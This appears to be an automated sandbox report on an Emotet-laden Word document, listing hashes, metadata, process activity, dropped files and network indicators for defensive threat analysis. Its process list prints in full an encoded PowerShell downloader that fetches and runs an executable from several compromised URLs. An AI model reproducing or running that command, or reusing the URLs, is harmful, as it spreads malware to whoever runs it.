analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

detail October 2019.doc

Full analysis: https://app.any.run/tasks/35fcf181-fe41-4d50-9cfa-6aabcf4deb6e
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: October 09, 2019, 14:45:24
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: internet solution, Subject: Research, Author: Katrina Kshlerin, Keywords: connecting, Comments: Grove, Template: Normal.dotm, Last Saved By: Norwood Crist, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 13:25:00 2019, Last Saved Time/Date: Wed Oct 9 13:25:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 170, Security: 0
MD5:

039F5F6B04FD35B83F946001AB990D8E

SHA1:

B0B2A67537A5F773A800C835E3217DD86E223309

SHA256:

7F6971EE0DFB6D9C9078E6580036F34F7512855D580845F20BB6DD401ABEBAA3

SSDEEP:

6144:NRQ8RcVAs3MwPxTqfVIddIiIZfnUzHZBRrnfKd5:NRQ8RcD3zxTqfWMxUdbf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 2816)

    • Creates files in the user directory

      • powershell.exe (PID: 2816)

    • PowerShell script executed

      • powershell.exe (PID: 2816)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2208)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2208)

    • Reads settings of System Certificates

      • powershell.exe (PID: 2816)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: McKenzie
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 198
Paragraphs: 1
Lines: 1
Company: Abernathy - Paucek
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 170
Words: 29
Pages: 1
ModifyDate: 2019:10:09 12:25:00
CreateDate: 2019:10:09 12:25:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Norwood Crist
Template: Normal.dotm
Comments: Grove
Keywords: connecting
Author: Katrina Kshlerin
Subject: Research
Title: internet solution
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2208"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\detail October 2019.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2816powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAMAA4AGIAeAAyADUAYwB4AGMANAA1AD0AJwBiADAAMAA2ADYAMABjADgANwAyAHgANgB4ACcAOwAkAGIAMAA3AGIAMAA0AHgAeAAyAGIAMAA3ACAAPQAgACcANwA0ADYAJwA7ACQAeAB4ADMAeABjADcANQAxADMAMQB4AD0AJwBjADcAMAAwAGIAMAAyADAAYgA4ADAANQAnADsAJAB4AHgAOQAwADAAMQBjADkAeAA0AGMAMwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgAwADcAYgAwADQAeAB4ADIAYgAwADcAKwAnAC4AZQB4AGUAJwA7ACQAYgBiADYAMgA5ADYAMAAwADQAYgAwAD0AJwBiADkAYwAyADAANABjADkAOQBiADYAMAAwACcAOwAkAGMAMAA5ADcAYgA4AHgAOQB4AGIAYgB4ADUAPQAmACgAJwBuAGUAJwArACcAdwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAEIAYwBsAGkARQBuAFQAOwAkAGMAYwA1ADAANgA2ADMANgAwAHgAeAA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGYAaQByAHMAdABlAHAAYwAuAGMAbwAuAHUAawAvAHAAYQByAHQAbgBlAHIAegB5AC8AcQBwAG0AdQAtAHgANgBhAHAAZAB2AC0ANAA3ADMANwAyAC8AQABoAHQAdABwADoALwAvAGMAaABvAHAAaAB1AGIAaQBuAGgALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvADIAMgBvADcAcQA2AGwAagB1ADgALQB2ADUAOQBzAGkAdwBrAC0AMwAzADgAMwAyADUALwBAAGgAdAB0AHAAOgAvAC8AYwBhAHMAYQBkAGUAYwBhAG0AcABvAHIAZQBhAGwAZQBzAHQAYQB0AGUAYgB5AGkAZABhAHIAbQBpAHMALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBjADAAMgB0AC0ANQBxAGsAcwBmADIANAAtADMAOQAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGYAaQB4AGkAZABhAHIAYgBpAC4AbAB2AC8AOAB6AGIAbgAvAGEAaQB0AHQAaQBwAEUALwBAAGgAdAB0AHAAcwA6AC8ALwBzAGgAbwBwAHQAZQBlAHAAYQByAHQAeQAuAGMAbwBtAC8AYwBoAGUAYwBrAGYAbwByAG0AYQB0AHMALwB0ADgAOABxAGEAaQA2AGEAcQAtAGEAdABoAGsAZwB6AGQALQA4ADEANAA5ADgANAAwADEANQAvACcALgAiAHMAUABgAEwASQBUACIAKAAnAEAAJwApADsAJAB4ADMANAA2ADAAMwBiAGMAMAAwADIAMQA9ACcAeAAwADAAMgAwADAAYgAwADMAYgBiAHgANQAnADsAZgBvAHIAZQBhAGMAaAAoACQAYwAwADAAMAAyADAAYgAzAHgAMgA4ADIAIABpAG4AIAAkAGMAYwA1ADAANgA2ADMANgAwAHgAeAApAHsAdAByAHkAewAkAGMAMAA5ADcAYgA4AHgAOQB4AGIAYgB4ADUALgAiAGQAYABvAFcAbgBsAE8AQQBkAGYAYABJAGAAbABlACIAKAAkAGMAMAAwADAAMgAwAGIAMwB4ADIAOAAyACwAIAAkAHgAeAA5ADAAMAAxAGMAOQB4ADQAYwAzACkAOwAkAGMAMwAwADEANAAwAGIAOAA1ADAANgA9ACcAeAAzADcAYwA1ADAANwAyADYAOAAwADQAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdAAnACsAJwBlAG0AJwApACAAJAB4AHgAOQAwADAAMQBjADkAeAA0AGMAMwApAC4AIgBsAGAARQBOAEcAVABIACIAIAAtAGcAZQAgADIANgA5ADEAMwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYQBgAFIAdAAiACgAJAB4AHgAOQAwADAAMQBjADkAeAA0AGMAMwApADsAJABiADUAMAAwADQAYwAwADcANAAwADIAPQAnAHgANgA1ADUANwA1ADgAMAA1ADAANwAnADsAYgByAGUAYQBrADsAJABjADQAOQAwADAAYgA2AGIAMwAwADAAPQAnAGIANAAwAGMAYwBjADYANQBiAHgAMQA0ADAAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAeAAwADYAMgBjADMANAA1ADAANQAxADEAPQAnAGMANgA1ADAAOQB4ADEAMQAyADkANQAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 645
Read events
1 127
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
17

Dropped files

PID
Process
Filename
Type
2208WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRF34.tmp.cvr
MD5:
SHA256:
2816powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OR63G9ZZE4BDO3NE00IM.temp
MD5:
SHA256:
2208WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3AAF1766.wmfwmf
MD5:62E05A76F1C08101CDEA983B45528D54
SHA256:4EB1BE5AF5136C1EC6FDD96F0FA2B6B6C8E43025E059DF2CE64EB56A7BC2D104
2208WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\detail October 2019.doc.LNKlnk
MD5:24DE246564951AE24265C8BF71484D30
SHA256:FFEBF6F37704720A98517D2F05ECE208260283A6E75E65464054859942D2A216
2208WINWORD.EXEC:\Users\admin\Desktop\~$tail October 2019.docpgc
MD5:0FC672DBB465D7FF40FD13AD95FF149C
SHA256:F5895B4EB62CD0AB8CF78ACAB94FFDBB0F410B4B0B030754C8371718E2D6452E
2208WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:4F9DEBFF059DB042870AE63481384E8F
SHA256:BA4A6EF654E43F16682BD2A2781CF336348004F20BC651A480C5DBC94799765D
2208WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\72CD42F.wmfwmf
MD5:33DFCEC792D9232CE59258BD191C9B1A
SHA256:6E7ECB823C4E63D6DDD42095FA3E9E23F6315F16A7A318794605EFD5C7764827
2208WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5A106598.wmfwmf
MD5:E7BCF1734133420ABDF3AB79AFC7252A
SHA256:23733A2BA03EB1B6DEB124593D212D26578A665442E330DA3C25867D6E8F7F98
2208WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:7345FE340B620F1C29D150528EED59C9
SHA256:708F5C60BDB95470BD6DD9E62A46E401C271CDBB397327F92270D2004D450B74
2816powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:57F2BEBD8AB4D14DFF05F8F1EE1B1091
SHA256:24089794FD7207234A86BFD7344771ABD7A0BC15DCEB1A256EF927F010B65B1F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2816
powershell.exe
GET
301
104.31.80.168:80
http://www.firstepc.co.uk/partnerzy/qpmu-x6apdv-47372/
US
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2816
powershell.exe
104.31.80.168:443
www.firstepc.co.uk
Cloudflare Inc
US
unknown
2816
powershell.exe
104.31.80.168:80
www.firstepc.co.uk
Cloudflare Inc
US
unknown

DNS requests

Domain
IP
Reputation
www.firstepc.co.uk
  • 104.31.80.168
  • 104.31.81.168
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
detail October 2019.doc